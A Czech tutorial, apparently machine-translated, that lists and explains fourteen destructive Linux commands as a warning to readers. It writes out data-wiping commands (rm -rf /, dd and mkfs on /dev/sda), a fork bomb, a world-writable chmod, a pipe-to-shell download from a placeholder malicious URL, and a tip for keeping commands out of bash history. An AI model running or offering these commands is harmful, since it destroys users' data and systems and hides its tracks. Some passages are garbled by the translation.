Úvod
Spouštění příkazů v linuxovém terminálu je snadné a rychlé a obvykle poskytuje lepší zážitek ve srovnání s používáním GUI k provádění stejného úkolu. Příkazy poskytují přístup k funkcím, které nejsou dostupné s linuxovým GUI, ale mohou být také nebezpečné, pokud si nejste jisti, co přesně dělají.
V tomto článku se dozvíte, kterým nebezpečným příkazům Linuxu byste se měli vyhnout a proč.
Upozornění: Nespouštějte tyto příkazy, protože některé z nich mohou vážně poškodit váš systém nebo soubory, vymazat vaše data, aniž byste předem vydali varování nebo potvrzení. Všechny snímky obrazovky poskytnuté v tutoriálu byly vytvořeny na virtuálním počítači.
1. rm -rf / Příkaz
rm příkaz v Linuxu umožňuje mazat soubory a adresáře. Neexistuje však žádná možnost obnovení, díky které budou smazané soubory navždy pryč. To znamená, že pomocí rm příkaz k trvalému odstranění citlivých systémových souborů by způsobil nestabilitu systému.
Příkaz je:
rm -rf /
Spuštění rm pomocí -r a -f flags vynutí rekurzivní smazání ve všech podadresářích. Spusťte jej na / kořenový adresář by zcela vymazal systém.
2. Příkaz>/dev/sda
Provedení příkazu a jeho připojení pomocí >/dev/sda zapíše výstup příkazu do /dev/sda bloku, tedy na vašem pevném disku. dev/sda blok obsahuje data souborového systému, která jsou poté nahrazena výstupem příkazu, čímž se poškodí váš systém a stane se neopravitelným.
Syntaxe je:
command >/dev/sda
command může být libovolný příkaz Linuxu. Například provedení příkazu shred zničí všechna data na disku.
3. :(){ :|:&};:Vidlicová bomba
Příkaz fork bomb vytvoří funkci nazvanou : a definuje obsah funkce, takže se sama spustí a převede do dalšího vlastního volání. Funkce tedy běží v popředí přičemž stejný proces běží na pozadí . Funkce se opakovaně spouští a replikuje, přičemž rychle zabírá všechny vaše zdroje, dokud systém nezamrzne.
Syntaxe příkazu fork bomb je:
:(){ :|:& };:
4.> souborový příkaz
Soubor > file příkaz je zkratka pro cat /dev/null > file .
Přesměrování příkazu do souboru může být velmi užitečné, ale chyba v syntaxi příkazu nebo neopatrné spuštění příkazu může vymazat kritický systémový soubor.
Soubor > file příkaz používá funkci přesměrování bash k vyprázdnění obsahu souboru a jeho vyčištění.
Například spusťte:
> phoenixnap.confVýstup vytvoří prázdný konfigurační soubor.
Navíc přidání mezery před příkaz zabrání jeho zobrazení v protokolu v prostředí Bash. To znamená, že někdo může vyprázdnit vaše soubory a nezůstane po nich žádná stopa, pokud před příkazem přidá mezeru.
5. Příkaz ^foo^bar
^foo^bar příkaz může být užitečný i nebezpečný. I když tento příkaz šetří čas, protože vám umožňuje upravit příkaz, který jste spustili dříve, a provést jej znovu, může také způsobit problémy, pokud před spuštěním důkladně nezkontrolujete provedené změny.
Příkaz nahradí první výskyt foo s bar . Například:
V prvním případě spuštění echo příkaz, výstup uvádí, že příkaz nebyl nalezen kvůli překlepu. Po spuštění ^foo^bar a opraví překlep, příkaz echo se provede správně.
6. mv adresář /dev/null
Dalším nebezpečným příkazem, který můžete najít online, je přesunutí adresáře nebo souboru do /dev/null . V systému Linux /dev/null je soubor známý jako "černá díra", protože ničí veškerá data, která přesunete do umístění souboru.
Nicméně, protože /dev/null není adresář, ale znakový soubor mv nelze jej přepsat jiným adresářem. Na druhou stranu tam můžete přesunout soubor a soubor přepíše obsah /dev/null .
Například:
sudo mv /home/bosko/employees.txt /dev/null
Po spuštění tohoto příkazu /dev/null je běžný soubor. Nebezpečí při provádění této změny spočívá v tom, že /dev/null nemá nikdy vydávat žádná data a nyní je to běžný soubor. Pokud je tato konfigurace nesprávná, může to vést k vkládání náhodných dat do systémových souborů, což vede k rozbití systému.
7. wget http://malicious_source_url -O-|sh
Příkaz wget umožňuje stahovat soubory v terminálu. Příkaz však může zadat příkaz wget stáhnout skript ze škodlivého zdroje a spustit jej pomocí sh .
Vždy věnujte pozornost adrese balíčku nebo souboru, který stahujete, a ujistěte se, že jde o důvěryhodný zdroj, jinak riskujete infekci vašeho systému.
8. crontab -r
crontab příkaz pomáhá automatizovat každodenní úkoly. Všechny příkazy a instrukce jsou však uloženy v jediném souboru crontab, který lze odstranit zadáním -r vlajka. To se může stát omylem, když chcete zadat -e příznak a omylem zadejte -r . Dejte si pozor, protože neexistuje žádné yes/no před odstraněním souboru.
Ujistěte se, že jste si zazálohovali svůj soubor crontab, protože po jeho odstranění není mnoho možností obnovení.
9. historie | sh
history | sh příkaz může být nebezpečný, protože provede každý příkaz z protokolu příkazů, který jste již provedli. Akce může způsobit nestabilitu systému a provádět příkazy, které jste nechtěli znovu provádět.
10. dd if=/dev/zero of=/dev/sda
Příkaz dd dává systému pokyn k zápisu dat na fyzické disky. Zdroj dat je definován v if parametr, který může být random of pokud chcete do bloku zapisovat náhodná data. if parametr může být také zero of pokud chcete vynulovat pevný disk. Obě možnosti odstraní OS z disku.
Například:
dd if=/dev/random of=/dev/sdaSpuštěním výše uvedeného příkazu se zaplní váš pevný disk náhodnými daty, což způsobí selhání systému.
11. mkfs.ext3 /dev/sda
mkfs příkaz vytvoří nový souborový systém na zadaném zařízení. Spuštění mkfs může být nebezpečné, pokud jste si před spuštěním příkazu nezálohovali data. Zformátuje určený oddíl/pevný disk a zcela z něj vymaže všechna data.
Upozornění: I když je užitečné formátovat diskové oddíly, formátování celého pevného disku (například /dev/sda ) ponechává systém neobnovitelný. Přečtěte si další informace o formátování diskových oddílů v systému Linux.
V následujícím příkladu mkfs vytvoří nový ext.3 souborový systém po naformátování celého pevného disku:
mkfs.ext3 /dev/sdaVzhledem k tomu, že příkaz zformátuje celý pevný disk, aby vytvořil nový souborový systém, systém již nelze spustit a zobrazí následující chybu:
V závislosti na vašich preferencích můžete také instruovat mkfs vytvořit jiný souborový systém, například ext4 . Můžete také zvolit formátování jednoho oddílu nebo jiného pevného disku, specifikovaného namísto /dev/sda :
mkfs.ext4 /dev/sda1
Ve výše uvedeném příkladu jsme dali pokyn mkfs pro vytvoření ext4 souborový systém na prvním oddílu na prvním pevném disku.
12. gunzip untrusted.gz
Rozbalení nedůvěryhodného archivu se může ukázat jako zipová bomba, známá také jako dekompresní bomba. Bomba zip je škodlivý soubor, který útočí na systém a snaží se jej přečíst. Při dekomprimaci soubor zabírá hodně místa na disku, což může být pro mnoho systémových služeb fatální.
Při manipulaci s archivy z nedůvěryhodných zdrojů je tedy nejlepší být opatrný, hlavně proto, že zip bomba je jedním z nejstarších škodlivých souborů na internetu.
13. Odebrat Python
Než začnete přemýšlet o odstranění starší verze Pythonu ze svého systému Linux, uvědomte si, že systém vyžaduje funkční instalaci pythonu2 fungovat správně. Odinstalování výchozí verze Pythonu na Ubuntu způsobí selhání Správce grafického zobrazení používaného pro přihlášení do systému a zablokujete se ze svého systému .
Pokud však víte, co děláte, můžete Python2.x.x a všechny jeho závislosti odinstalovat spuštěním:
sudo apt purge python2.x-minimal14. chmod -R 777 /
Linux je systém pro více uživatelů a chmod příkaz vám umožňuje změnit oprávnění k souboru pro konfiguraci přístupu uživatele k určitému souboru nebo adresáři.
Chmod však může rekurzivně změnit oprávnění všech vašich souborů:
chmod -R 777 /Výše uvedený příkaz umožňuje všem uživatelům číst, zapisovat a spouštět všechny soubory v systému, což ohrožuje zabezpečení. Kromě toho mohou některé systémy selhat, pokud jsou oprávnění příliš otevřená a brání spuštění systému.